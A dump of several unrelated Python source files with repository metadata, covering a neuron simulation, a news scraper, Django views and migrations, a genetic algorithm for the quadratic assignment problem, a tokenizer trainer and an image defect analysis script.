b06c8463f9c8a28acbcad928d34d2e74359aa769
|
refs/heads/master
| 2021-01-11T22:09:42.578264
| 2017-01-14T08:28:59
| 2017-01-14T08:28:59
| 78,926,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,439
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 19 21:17:41 2016
@author: eric
"""
import numpy as np
def LIF_neuron(dt,v0,taum,gL,Vrest,Vr,Vt,arp,arp_counter,se,con_matrix,num_pyr,num_inh,num_chat,sampa,sgaba,snmda,gampa,ggaba,gnmda,gampae,vampa,vgaba,vnmda,DC):
v = v0.copy() # copy timestep i to make timestep i+1
# sum up inputs from all connected neurons of each type
sa = np.dot(sampa,con_matrix[:num_pyr,:])
sg = np.dot(sgaba,con_matrix[num_pyr:num_pyr+num_inh,:])
sn = np.dot(snmda,con_matrix[:num_pyr,:])
# sc = np.apply_along_axis(lambda m: np.dot(m,schat),0,con_matrix[num_pyr+num_inh:num_pyr+num_inh+num_chat,:])
I = gL*(v0-Vrest) + se*gampae*(v0-vampa) + sa*gampa*(v0-vampa) + sg*ggaba*(v0-vgaba) + sn*gnmda*(v0-vnmda) - DC
R = 1 / (gL + se*gampae + sa*gampa + sg*ggaba + sn*gnmda) # [MOhms]
v_inf = Vrest-(I*R) # find steady-state voltage [mV]
v[(v0==Vr) & (arp_counter<arp/dt)] = Vr # if refractory period is not over, continue refractory period
arp_counter[(v0==Vr) & (arp_counter<arp/dt)] += 1 # increase refractory period counter
v[(v0!=Vr) | (arp_counter>=arp/dt)] = v0[(v0!=Vr) | (arp_counter>=arp/dt)]*(1-(dt/taum)) + v_inf[(v0!=Vr) | (arp_counter>=arp/dt)]*(dt/taum) # if voltage is not during refractory period, integrate next voltage step
v[v0>Vt] = Vr # if voltage exceeds threshold, set next step to reset voltage
return v, arp_counter, I, sa, sg, sn, R
|
[
"eric.melonakos@gmail.com"
] |
eric.melonakos@gmail.com
|
f4397551c757ec6c02227871baabb84f4703f2ba
|
78c455c0095a5e1cc5bb76b9c3e686012e72c8f3
|
/prod/universal.py
|
c77ab17b62dee0329efadd1a04610307be396b1e
|
[] |
no_license
|
JorgeRamos01/Proyecto-texto
|
0ec04815d4442ea03d336f8071ef2b01c2696cce
|
a19f551f807652b30aba4cd5a412f8dae95263db
|
refs/heads/master
| 2020-05-31T21:00:08.454819
| 2019-06-06T00:53:41
| 2019-06-06T00:53:41
| 190,488,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,537
|
py
|
# #Scrapepr el universal, seccion de opinion
from bs4 import BeautifulSoup
from urllib.request import Request, urlopen
import re
import datetime
from pgdbqueries import send_data_to_db # module to connect data base
from custom_printing import CustomWrite # new class (for printing logs)
cw = CustomWrite("El Universal") # instance class CW
cw.header() # Header
now = datetime.datetime.now()
site= "https://www.eluniversal.com.mx/opinion"
hdr = {'User-Agent': 'Mozilla/5.0'}
req = Request(site,headers=hdr)
data = urlopen(req)
soup=BeautifulSoup(data,"html5lib")
urls=[]
for a in soup.find_all('a', href=True): #Conseguimos las urls de notas de opinion
if "/articulo" in str(a['href']):
urls.append("https://www.eluniversal.com.mx"+a['href'])
if "/columna" in str(a['href']):
urls.append("https://www.eluniversal.com.mx"+a['href'])
for i in range(len(urls)):
if "https://www.eluniversal.com.mxh" in urls[i]:
urls[i]=urls[i][len("https://www.eluniversal.com.mx"):]
num_url=0
cw.init_counter(len(urls)) # initialize counter of the object CW
for j in urls: #Obtenemos el contenido de las notas de opinion
site1= j
hdr1 = {'User-Agent': 'Mozilla/5.0'}
req1 = Request(site1,headers=hdr1)
data1 = urlopen(req1)
soup1=BeautifulSoup(data1,"html5lib")
fecha_pub=soup1.find('div',{'class','fechap'}).get_text() #Consigue la fecha de publicacion en el formato deseado
if fecha_pub==str(now.day)+"/"+str(now.month)+"/"+str(now.year):
seccion="Opinion"
periodico="El Universal"
title=soup1.find('title').get_text() #Consigue el titulo
texto=str(soup1.find('div', {'class', 'field field-name-body field-type-text-with-summary field-label-hidden'}).find_all('p'))
texto=texto.replace("</p>, <p>","\n")
texto=texto[4:texto.find('</p>, <p class')]
texto=re.sub('<[^>]+>', '', texto)
texto=texto.replace('Read in English',"")
fecha_scrap=datetime.datetime.now()
# Send content to data base in PostgreSQL
# send_data_to_db(news_title = title, scrapping_date = fecha_scrap,
# section_name = seccion,
# news_content = texto, importance_level = "Nacional",
# news_link = j,
# newspaper_name = periodico, news_name_place_reported = None,
# news_date_reported = fecha_scrap) # send data
num_url += 1
cw.debug("Formato de fecha: " + fecha_pub) # debugging
cw.status_insert() # from class CustomWrite: Status
if num_url==0:
print("No hay noticias nuevas")
cw.footer() # Footer
|
[
"noreply@github.com"
] |
noreply@github.com
|
4c28fb4f582f50a67dcbcb1a70ba13520bbc73b6
|
16f48de6fd77f0a1b2a60dbcf897e50726d91770
|
/Models/ConcreteFactory/sms_notif_factory.py
|
650916d18707ffb61df563b5d3625775225ae900
|
[] |
no_license
|
dibyasom/UNICC-JsonRedo
|
7abadf968d2a4a4cce4c2fe7426231e05b6207c5
|
7c2d08c2c4c14a1993aff8b23443d54844edc482
|
refs/heads/main
| 2023-09-06T03:18:05.685867
| 2021-09-02T10:09:59
| 2021-09-02T10:09:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
# Importing dependecnies and parent factory model.
"""
Concrete Factory override the factory method in order to change the resulting
product's type.
"""
# Importing dependecnies and parent factory model.
from ..Factory.notif_factory import NotifierFactory
from ..Interface.notif_interface import Notifier
from ..Product.sms_notif import SmsNotifier
from Models.User import User
class SmsNotifierFactory(NotifierFactory):
def __init__(self, user: User) -> None:
self.user = user
def _factory_method(self) -> Notifier:
return SmsNotifier(user=self.user)
|
[
"dibya.secret@gmail.com"
] |
dibya.secret@gmail.com
|
2b44b6f0f3f0b9d259ad52416362ca4d246b0348
|
342fc6f60c688a21b9ba4a8e8b64438d77039ba2
|
/CNCS/CNCS/nxs/raw.py
|
c37c120916552715a26b08dd44b35ff7a2eded11
|
[] |
no_license
|
mcvine/instruments
|
854001fe35063b1c8c86e80495093ce72884771f
|
8e41d89c353995dcf5362a657a8bb5af08ff186c
|
refs/heads/master
| 2023-04-03T11:01:53.232939
| 2023-04-02T04:16:07
| 2023-04-02T04:16:07
| 120,621,268
| 1
| 0
| null | 2023-04-02T04:16:08
| 2018-02-07T13:51:36
|
Python
|
UTF-8
|
Python
| false
| false
| 3,916
|
py
|
# -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2008-2015 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
"""
This module helps creating "raw" CNCS nexus file.
"""
def write(events, tofbinsize, path):
""" write neutron events into a CNCS nexus file
The events is a numpy array of "event" records.
An event record has three fields:
* pixelID
* tofChannelNo
* p
tofbinsize * tofChannelNo is the tof for the bin
path is the output path
"""
# implementation details
# -1. h5py is used for handling the file.
# 0. make a new file by first copying a template file to a new file, and then adding new data
# 1. events are splitted to banks and saved. for a bank, all events are in bank{i}_events
# 2. any bank must have at least one event. if there are no events, we must assign fake ones
import shutil, sys
shutil.copyfile(nxs_template, path)
import time; time.sleep(0.5) # bad bad
import h5py
f = h5py.File(path, 'a')
entry = f['entry']
# XXX: hack
etz_attrs = {
'units': np.string_('second'),
'offset': np.string_('2012-08-23T11:23:53.833508666-04:00'),
'offset_seconds': 714583433,
'offset_nanoseconds': 833508666,
}
for bank in range(nbanks):
# print bank
sys.stdout.write('.')
# bank events
pixelidstart = bank * pixelsperbank
pixelidend = pixelidstart + pixelsperbank
bevts = events[(events['pixelID']<pixelidend) * (events['pixelID']>=pixelidstart)]
if not bevts.size:
# fake events. mantid cannot handle empty events
bevts = events[0:1].copy()
evt = bevts[0]
evt['pixelID'] = pixelidstart
evt['tofChannelNo'] = 0
evt['p'] = 0
# bank events directory
be = entry['bank%s_events' % (bank+bank_id_offset)]
be['event_id'] = bevts['pixelID'] + pixel_id_offset
be['event_time_offset'] = np.array(bevts['tofChannelNo'], dtype='float32') * tofbinsize
be['event_time_offset'].attrs['units'] = np.string_('microsecond')
be['event_weight'] = np.array(bevts['p'], dtype='float32')
be['event_index'] = np.array([0, len(bevts)], dtype='uint64')
be['event_time_zero'] = np.array([0, 1./60], dtype='float64')
etz = be['event_time_zero']
# hack
etz_attrs['target'] = np.string_('/entry/instrument/bank%s/event_time_zero' % (bank+bank_id_offset))
for k,v in etz_attrs.items(): etz.attrs[k] = v
# XXX: should this be a float and the sum of all weights?
# XXX: michael reuter said this is not really used
be['total_counts'][0] = len(bevts)
# bank directory
b = entry['bank%s' % (bank+bank_id_offset)]
# XXX: should this be float array?
# XXX: michael reuter said this is not really used
# compute histogram
# h, edges = np.histogram(bevts['pixelID'], pixelsperbank, range=(pixelidstart-0.5, pixelidend-0.5)) # weights = ?
# h.shape = 8, 128
# b['data_x_y'][:] = np.array(h, dtype='uint32')
continue
# XXX: should it be a float?
# entry['total_counts'][0] = len(events)
#
f.close()
#
sys.stdout.write('\n')
return
bank_id_offset = 1
pixelsperbank = 8 * 128
pixel_id_offset = (bank_id_offset-1)*pixelsperbank
nbanks = 50
npixels = nbanks * pixelsperbank
import os
from mcvine import resources as res
nxs_template = os.path.join(
res.instrument('CNCS'), 'nxs',
'cncs-raw-events-template.nxs',
)
import numpy as np
# End of file
|
[
"linjiao@ornl.gov"
] |
linjiao@ornl.gov
|
455b47e9572a2598ff0b2997545f882039909442
|
c6dfa465c05be2ad350e8ef7c3c2c35a4dce41d2
|
/explorations/wiener-exp.py
|
b19e914948c63345b0f6a618261404b585dffcf7
|
[] |
no_license
|
bogeorgiev/heating-up-dbs
|
b6e78f1d7ccd59005fd9d73544e311d9e088f5f3
|
bf75787b6594590e72c32e678b565bbd47acf9ba
|
refs/heads/master
| 2023-02-24T06:40:19.168808
| 2021-01-29T11:17:45
| 2021-01-29T11:17:45
| 260,421,263
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,555
|
py
|
import torch
from torch.distributions.multivariate_normal import MultivariateNormal
from torch.distributions.normal import Normal
import math
from matplotlib import pyplot as plt
import numpy as np
dim = 3
alpha = 1.0e2
num_walks = 10000
num_steps = 100 * alpha
step = 2.0e-1 / math.sqrt(alpha)
compute_empirical = False
normal_distrib = MultivariateNormal(torch.zeros(dim), torch.eye(dim))
normal_1d = Normal(torch.tensor(0.0), torch.tensor(1.0))
sample = torch.zeros(dim)
msd = .0
msd_th = step * math.sqrt( num_steps * dim)
radius = msd_th
#hyperplane to hit at dist
dist = 0.9 * msd_th #2.0e0
mesh_size = 200
t = torch.tensor(num_steps * step**2)
print("BM run for time: ", t)
print("RMSD (theoretical): ", msd_th)
print("Hitting Prob (theoretical): ", 2 * normal_1d.cdf(-dist / torch.sqrt(t)))
vols = []
caps = []
for j in range(mesh_size):
h = dist * (float(j) / mesh_size)
if (compute_empirical):
error_rate = torch.randn(num_walks, dim + 2)
error_rate = radius * error_rate / error_rate.norm(dim=1).unsqueeze(1)
error_rate = error_rate[:, :-2]
error_rate = error_rate[:, 0]
error_rate = (error_rate > h).sum()
vol = error_rate.float() / num_walks
else:
vol_cap = math.pi * ((radius - h)**2) * (2*radius + h) / 3
vol_ball = 4 * math.pi * (radius**3) / 3
vol = float(vol_cap) / vol_ball
vols = vols + [vol]
hits = 0
if (compute_empirical):
for i in range(num_walks):
walk_has_hit_target = False
for s in range(int( num_steps)):
sample += step * torch.randn(dim)
#sample += step * normal_distrib.sample()
if sample[0] > h and not walk_has_hit_target:
hits += 1
walk_has_hit_target = True
break
msd += sample.norm()
sample = torch.zeros(dim)
msd = msd / num_walks
cap = hits / num_walks
else:
cap = 2 * normal_1d.cdf(-h / ( torch.sqrt(t)))
caps = caps + [cap]
tau = torch.tensor(caps) / torch.tensor(vols)
plt.plot([dist * (float(i) / mesh_size) for i in range(mesh_size)], torch.tensor(caps).numpy(), color='r')
plt.plot([dist * (float(i) / mesh_size) for i in range(mesh_size)], torch.tensor(vols).numpy(), color='g')
plt.plot([dist * (float(i) / mesh_size) for i in range(mesh_size)], tau.numpy(), color='b')
plt.show()
if (compute_empirical):
print("MSD (empirical): ", msd)
print("Hitting Prob (empirical): ", hits / num_walks)
|
[
"lukas.b.franken@gmail.com"
] |
lukas.b.franken@gmail.com
|
f607cc5e2526bcc268de801f40a60c5f8d777c39
|
558ad954a7b150ce95a30e5b1b4d277ed8286d46
|
/0x04-python-more_data_structures/8-simple_delete.py
|
48e0c39dd411cfe4884cd6a191de83073610e039
|
[] |
no_license
|
Indifestus/holbertonschool-higher_level_programming
|
9cf41f53d164a6612ea982c28468d2a330212920
|
aaaa08577888828016557826f85a98893d8e9cca
|
refs/heads/master
| 2023-03-15T19:06:48.626734
| 2018-01-15T02:27:29
| 2018-01-15T02:27:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
#!/usr/bin/python3
def simple_delete(my_dict, key=""):
if my_dict is not None:
my_dict.pop(key, None)
return my_dict
|
[
"andrew.birnberg@gmail.com"
] |
andrew.birnberg@gmail.com
|
173842b445e851f4641e07b28cf9e78b33a41bae
|
68d6c069e5248451390b6caf0bcdc40026bfdf84
|
/Python/hw2/VectorCal.py
|
07fa8f17bf0836d84144884e466831a30fc2d191
|
[] |
no_license
|
Nightlord851108/HowToSolveIt
|
64cb058a58c871cff83d49957d4ffd41d5387c32
|
7a21060030dbb6931008becb09a4de01141ce92a
|
refs/heads/master
| 2020-03-23T19:24:10.564832
| 2020-01-30T05:49:59
| 2020-01-30T05:49:59
| 141,975,069
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 464
|
py
|
def vectorSum(v, u, d1, d2):
if (d1 != 0) & (d1 == d2):
i = 0
ans = []
while i < d1:
ans.append(v[i] + u[i])
i = i + 1
return ans
return "Dimensional Error"
def innerProduct(v, u, d1, d2):
if (d1 != 0) & (d1 == d2):
i = 0
sum = 0
while i < d1:
sum = sum + v[i] * u[i]
i = i + 1
return sum
return "Dimensional Error"
|
[
"“nightlord851108@gmail.com”"
] |
“nightlord851108@gmail.com”
|
336d03d10e2a186fdf639286c125e67ed25c4421
|
275c578b5ae0b5d7e2931b10948c48a044d2687c
|
/app/main/views.py
|
08ed2b9b5b08692453c109ca0cf632cae8a116c7
|
[] |
no_license
|
mibei001/news
|
a311061744cdc9d240aeb55f59a1ef981bac5f37
|
2f078477a5b6162b0b302538c492bcae394aed48
|
refs/heads/master
| 2023-09-03T05:31:13.079048
| 2021-11-08T09:16:42
| 2021-11-08T09:16:42
| 424,885,764
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 957
|
py
|
from flask import render_template,request,redirect,url_for
from . import main
from ..requests import get_source,get_article
from ..models import Source
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
# Getting News source
title = ' Welcome to online news highlight website'
source = get_source('technology')
sports_source = get_source('sports')
business_source = get_source('business')
entertainment_source = get_source('entertainment')
return render_template('index.html',title = title, technology = source,sports = sports_source,business = business_source,entertainment= entertainment_source)
@main.route('/source/<id>')
def article(id):
'''
View article page function that returns the article details page and its data
'''
article = get_article(id)
return render_template('article.html',id = id, article = article)
|
[
"kevin.mibei@moringaschool.com"
] |
kevin.mibei@moringaschool.com
|
50a1caa06984cbfea5664ed189a0988188a9b83f
|
cc31a912aea9bf0ecd47cd737afee7e96a242054
|
/blogproject/blog/feeds.py
|
dbc833ebfed51c3135b05bc687b3857387e38223
|
[] |
no_license
|
tanglang1990/blog_for_person
|
77ec7fa029045bfc03c6d12b39bf06612fc34703
|
fa77041a4dfdfef05ce032eff334aa1df854c988
|
refs/heads/master
| 2020-04-23T06:22:57.256344
| 2018-10-17T07:35:39
| 2018-10-17T07:35:39
| 170,971,341
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 727
|
py
|
from django.contrib.syndication.views import Feed
from .models import Article
class AllPostsRssFeed(Feed):
# 显示在聚合阅读器上的标题
title = "Django 博客教程演示项目"
# 通过聚合阅读器跳转到网站的地址
link = "/"
# 显示在聚合阅读器上的描述信息
description = "Django 博客教程演示项目测试文章"
# 需要显示的内容条目
def items(self):
return Article.objects.all()
# 聚合器中显示的内容条目的标题
def item_title(self, item):
return '[%s] %s' % (item.category, item.title)
# 聚合器中显示的内容条目的描述
def item_description(self, item):
return item.content
|
[
"782555894@qq.com"
] |
782555894@qq.com
|
b5ebdfe3b10eec2fa3575652a3e0276ef6f4b913
|
332e04cf48647c120161f3765fe3285a38fc44db
|
/qap_lab/source/solver.py
|
4737c3303eae5ae21be6d978a9335d1cd4ed70c3
|
[] |
no_license
|
Venopacman/comb_opt_lessons
|
7783d2eab3d037c566f84442fb1b8d4af00ad864
|
687aa6d5eab6424f1e310e0ac1230ca11670cc82
|
refs/heads/master
| 2020-03-29T12:41:39.226108
| 2018-11-25T21:17:15
| 2018-11-25T21:17:15
| 149,912,955
| 4
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,695
|
py
|
import itertools
import os
import random
from copy import deepcopy
from typing import List
import numpy as np
import tqdm
from qap_lab.source.data_utils import Problem
from tqdm import trange
import json
import os
from multiprocessing import Pool
class Chromosome:
"""
Permutation vector wrapper
"""
def __init__(self, gene_list: List[int], _problem: Problem):
self.genome = gene_list
self.flow_matrix = _problem.flow_matrix
self.dist_matrix = _problem.distance_matrix
self.fitness = self.calc_fitness()
# print(self.fitness)
def calc_fitness(self) -> float:
n = len(self.genome)
return sum([self.dist_matrix[i][j] * self.flow_matrix[self.genome[i]][self.genome[j]]
for i in range(n)
for j in range(n)])
def swap_mutation(self):
pass
def scrumble_mutation(self):
pass
def persist(self, dir, problem_name):
with open(os.path.join(dir, problem_name), 'w') as f:
f.write(" ".join([str(it + 1) for it in self.genome]))
class Population:
def __init__(self, _chromosome_list: List[Chromosome], _problem: Problem):
self.chromosome_list = _chromosome_list
self.problem = _problem
self.rolling_wheel_prob = self.calc_rolling_wheel_prob()
def breeding(self) -> None:
"""
Population evolving process
"""
pass
def get_best_chromosome(self) -> Chromosome:
return min(self.chromosome_list, key=lambda x: x.fitness)
def calc_rolling_wheel_prob(self):
"""
Calculate inverted related fitness for minimization task
:return:
"""
_sum = sum([1 / chrom.fitness for chrom in self.chromosome_list])
probs = [(1 / chrom.fitness) / _sum for chrom in self.chromosome_list]
return probs
def select_n_chromosomes(self, n: int) -> List[Chromosome]:
selected_index = np.random.choice(len(self.chromosome_list), n, p=self.rolling_wheel_prob)
return [self.chromosome_list[i] for i in selected_index]
class GeneticAlgorithmSolver:
def __init__(self, _problem: Problem):
self.problem = _problem
self.population_size = 100
self.selection_size = int(self.population_size * 0.3)
self.population = self.generate_initial_population()
def generate_initial_population(self) -> Population:
_chromo_list = set()
genome = list(range(self.problem.problem_size))
while len(_chromo_list) != self.population_size:
# for _ in range(self.population_size):
_chromo_list.add(Chromosome(deepcopy(genome), self.problem))
random.shuffle(genome)
return Population(list(_chromo_list), self.problem)
def selection(self, population: Population) -> List[Chromosome]:
"""
Rolling wheel selection
:param population:
:return:
"""
return population.select_n_chromosomes(self.selection_size)
def ordered_crossover(self, chrom_1: Chromosome, chrom_2: Chromosome) -> Chromosome:
_ub = len(chrom_1.genome) - 1
start_index = np.random.randint(0, _ub)
end_index = start_index + np.random.randint(1, _ub - start_index + 1)
alpha_genome = chrom_1.genome[start_index:end_index]
beta_genome = [gen for gen in chrom_2.genome if gen not in alpha_genome]
resulted_genome = beta_genome[:start_index] + alpha_genome + beta_genome[start_index:]
return Chromosome(resulted_genome, self.problem)
def reproduction(self, parents: List[Chromosome], n: int) -> List[Chromosome]:
pairs_universe: List[(Chromosome, Chromosome)] = [(ch_1, ch_2) for ch_1 in parents for ch_2 in parents
if ch_1 != ch_2]
# pair_sample = [pairs_universe[i] for i in
# ]
child_list = set()
# for parent_1, parent_2 in pair_sample:
while len(child_list) != n:
parent_1, parent_2 = pairs_universe[
np.random.choice(len(pairs_universe), n, p=[1 / len(pairs_universe)] * len(pairs_universe))[0]]
child_list.add(self.ordered_crossover(parent_1, parent_2))
return list(child_list)
def solve(self) -> Chromosome:
current_best: Chromosome = self.population.get_best_chromosome()
# t = trange(100, desc='Solving')
for _ in range(25000):
# avg_fitness = np.average([it.fitness for it in self.population.chromosome_list])
# t.set_description('Solving (avg fitness=%g)' % avg_fitness)
parents = self.selection(self.population)
childes = self.reproduction(parents, self.population_size - self.selection_size)
self.population = self.mutation(childes, parents)
cand_best: Chromosome = self.population.get_best_chromosome()
if cand_best.fitness < current_best.fitness:
current_best = cand_best
# print('Best update: {0}'.format(current_best.fitness))
return current_best
def mutation(self, _childes: List[Chromosome], _parents: List[Chromosome]):
def _mutate(_chromosome: Chromosome) -> Chromosome:
def _swap(_chromosome, a_ind, b_ind) -> Chromosome:
_genome = _chromosome.genome
_genome[a_ind], _genome[b_ind] = _genome[b_ind], _genome[a_ind]
return Chromosome(_genome, self.problem)
def _scramble(_chromosome, a_ind, b_ind) -> Chromosome:
_genome = _chromosome.genome
_buff = deepcopy(_genome[a_ind:b_ind])
random.shuffle(_buff)
_genome[a_ind:b_ind] = _buff
return Chromosome(_genome, self.problem)
_ub = len(_chromosome.genome) - 1
start_index = np.random.randint(0, _ub)
end_index = start_index + np.random.randint(1, _ub - start_index + 1)
if random.uniform(0, 1) > 0.5:
return _swap(_chromosome, start_index, end_index)
else:
return _scramble(_chromosome, start_index, end_index)
unmutated_population = _childes + _parents
threshold = random.uniform(1 / self.population_size, 1 / self.problem.problem_size)
resulted_population = []
for chromosome in unmutated_population:
if random.uniform(0, 1) > threshold:
resulted_population.append(chromosome)
else:
resulted_population.append(_mutate(chromosome))
return Population(resulted_population, self.problem)
def main(path):
problem_name = path.split("/")[-1].split(".")[0]
tai_problem = Problem(path)
genetic_solver = GeneticAlgorithmSolver(tai_problem)
solution = genetic_solver.solve()
result_dict = json.load(open("../data/best_results.json"))
if result_dict[problem_name] > solution.fitness or result_dict[problem_name] == 0:
solution.persist(os.path.dirname(path), problem_name + ".sol")
print("Improvement in {0} problem!".format(problem_name))
result_dict[problem_name] = int(solution.fitness)
print("Problem {0} finished!".format(problem_name))
json.dump(result_dict, open("../data/best_results.json", 'w'), indent=2)
if __name__ == "__main__":
root_dir = '../data'
problem_path_list = [os.path.join(root_dir, it) for it in os.listdir(root_dir) if
not (it.endswith(".json") or it.endswith(".sol"))] * 10
with Pool(processes=4) as pool:
for res in pool.imap_unordered(main, problem_path_list):
pass
|
[
"pdsmirnov@yandex.ru"
] |
pdsmirnov@yandex.ru
|
ca533f2d101a318a97772ebfb27bef0b60460aa2
|
a82961498421f8dbc6ed15ba7c22d82763b85e95
|
/rides_handling/migrations/0019_auto_20180514_1703.py
|
0ec616da15661531563117745b8860da2fc9c0a5
|
[
"MIT"
] |
permissive
|
EverythingWorks/Unter
|
f7ae61c33f66ec37b48a3e2f86dfa6f5d9edd9f2
|
a03b4c8fc5cc77095021b9b504ea6c00de8a5a18
|
refs/heads/master
| 2020-03-10T07:25:56.055846
| 2018-06-04T04:22:21
| 2018-06-04T04:22:21
| 129,262,544
| 4
| 1
|
MIT
| 2018-05-29T14:03:35
| 2018-04-12T14:17:22
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 747
|
py
|
# Generated by Django 2.0.4 on 2018-05-14 17:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rides_handling', '0018_auto_20180512_0937'),
]
operations = [
migrations.AddField(
model_name='ride',
name='estimated_trip_time',
field=models.DecimalField(decimal_places=6, default=0, max_digits=9),
preserve_default=False,
),
migrations.AlterField(
model_name='ride',
name='driver',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='driver', to='rides_handling.Profile'),
),
]
|
[
"danpisq@gmail.com"
] |
danpisq@gmail.com
|
bf81381a68065e4e52ed4a7600692ef8632e9a7c
|
d076d75093b374418b5704703f841623344c0a82
|
/Tokenizer/make_tokenizer.py
|
c02073ccd07173d25698296a1b1dcac4630d2499
|
[] |
no_license
|
sangHa0411/BERT
|
db1e3284ed22927fc2f19e819a5946b634c9bacf
|
cb272f94d77770b9b29d7493238e5ea1c5554420
|
refs/heads/main
| 2023-08-28T14:20:31.398036
| 2021-10-19T01:25:06
| 2021-10-19T01:25:06
| 417,094,479
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,996
|
py
|
import os
import re
import sys
import argparse
from tqdm import tqdm
from nltk.tokenize import sent_tokenize
from konlpy.tag import Mecab
def train(args) :
sys.path.append('../')
from tokenizer import write_data, train_spm
from loader import get_data, preprocess_data
from preprocessor import SenPreprocessor
print('Get Newspaper Data')
data = get_data(args.data_dir, args.file_size)
print('Extract Text Data')
text_data = []
for json_data in tqdm(data) :
text_list = preprocess_data(json_data)
text_data.extend(text_list)
print('Tokenizing Data')
sen_data = []
for text in tqdm(text_data) :
sen_list = sent_tokenize(text)
sen_data.extend(sen_list)
print('Size of Sentence Data : %d \n' %len(sen_data))
print('Preprocessing Data')
mecab = Mecab()
sen_preprocessor = SenPreprocessor(mecab)
sen_preprocessed = []
for sen in tqdm(sen_data) :
if len(sen) > args.max_size :
continue
sen = sen_preprocessor(sen)
if sen != None :
sen_preprocessed.append(sen)
print('Write Text Data')
text_path = os.path.join(args.tokenizer_dir, 'kor_newspaper.txt')
write_data(sen_preprocessed, text_path)
print('Train Tokenizer')
train_spm(text_path, os.path.join(args.tokenizer_dir, 'tokenizer'), args.token_size)
if __name__ == '__main__' :
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='../../Data', help='Korean Newspaper Data directory')
parser.add_argument('--max_size', type=int, default=256, help='max length of sentence')
parser.add_argument('--file_size', type=int, default=30, help='size of newspaper file')
parser.add_argument('--tokenizer_dir', type=str, default='./', help='File Writing Directory')
parser.add_argument('--token_size', type=int, default=35000, help='Token Size (default: 35000)')
args = parser.parse_args()
train(args)
|
[
"noreply@github.com"
] |
noreply@github.com
|
34d788e9ab997f619139b8af4b45a786cee0aac0
|
ce27a376fa4f6a25008674d007c670a4a0b8bda7
|
/defects_thresholding.py
|
1c96261ba4ebe8222fcc90b839c16ced1c0d9cfa
|
[] |
no_license
|
jrr1984/defects_analysis
|
22139b7734478b6261cf9efeaae755a2c5c71c79
|
2e43b65f1b936516f4a4c8f7feb5d46468864957
|
refs/heads/master
| 2020-12-10T20:00:39.977833
| 2020-04-16T12:00:22
| 2020-04-16T12:00:22
| 233,694,615
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,701
|
py
|
from skimage.filters import threshold_yen,threshold_isodata
from skimage import io,measure,img_as_float,morphology
from skimage.measure import regionprops_table
from skimage.color import label2rgb
import numpy as np
from scipy import ndimage
import matplotlib.pyplot as plt
from matplotlib_scalebar.scalebar import ScaleBar
import pandas as pd
import glob
import time
start_time = time.time()
pixels_to_microns = 0.586
proplist = ['equivalent_diameter','area']
path = "C:/Users/juanr/Documents/mediciones_ZEISS/TILING/NIR/norm/*.tif"
data= []
holes_data = []
i=0
for file in glob.glob(path):
img = io.imread(file)
img = img_as_float(img)
thresh = threshold_yen(img)
binary = img <= thresh
binary_var = img <= (thresh - 0.1*thresh)
masked_binary = ndimage.binary_fill_holes(binary)
masked_binary_var = ndimage.binary_fill_holes(binary_var)
hols = masked_binary.astype(int) - binary
hols_var = masked_binary_var.astype(int) - binary_var
lab = measure.label(hols,connectivity=2)
lab_var = measure.label(hols_var, connectivity=2)
cleaned_holes = morphology.remove_small_objects(lab, connectivity=2)
cleaned_holes_var = morphology.remove_small_objects(lab_var, connectivity=2)
label_image = measure.label(masked_binary,connectivity=2)
label_image_var = measure.label(masked_binary_var, connectivity=2)
label_final = morphology.remove_small_objects(label_image, min_size=15)
label_final_var = morphology.remove_small_objects(label_image_var, min_size=15)
if label_final.any()!=0 and label_final_var.any() !=0:
props = regionprops_table(label_final, intensity_image=img, properties=proplist)
props_var = regionprops_table(label_final_var, intensity_image=img, properties=proplist)
props_df = pd.DataFrame(props)
props_df_var = pd.DataFrame(props_var)
props_df['error_diameter'] = abs(round((props_df['equivalent_diameter'] - props_df_var['equivalent_diameter'])*pixels_to_microns))
props_df['error_area'] = abs(round((props_df['area'] - props_df_var['area']) * pixels_to_microns ** 2))
props_df['img'] = i
data.append(props_df)
print('defects_df')
print(props_df)
print('error')
print(props_df['error_diameter'])
if cleaned_holes.any()!= 0 and cleaned_holes_var.any() != 0:
props_holes = regionprops_table(cleaned_holes, intensity_image=img, properties=proplist)
props_holes_var = regionprops_table(cleaned_holes_var, intensity_image=img, properties=proplist)
holes_df = pd.DataFrame(props_holes)
holes_df_var = pd.DataFrame(props_holes_var)
holes_df['error_diameter'] = abs(round((holes_df['equivalent_diameter'] - holes_df_var['equivalent_diameter'])*pixels_to_microns))
holes_df['error_area'] = abs(round((holes_df['area'] - holes_df_var['area']) * pixels_to_microns**2))
holes_df['img'] = i
holes_data.append(holes_df)
print('holes_df')
print(holes_df)
print('error holes')
print(holes_df['error_diameter'])
print(file, i)
i += 1
df = pd.concat(data)
df['equivalent_diameter'] = round(df['equivalent_diameter'] * pixels_to_microns)
df['area'] = round(df['area'] * pixels_to_microns **2)
df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsNIR_df.pkl")
holes_df = pd.concat(holes_data)
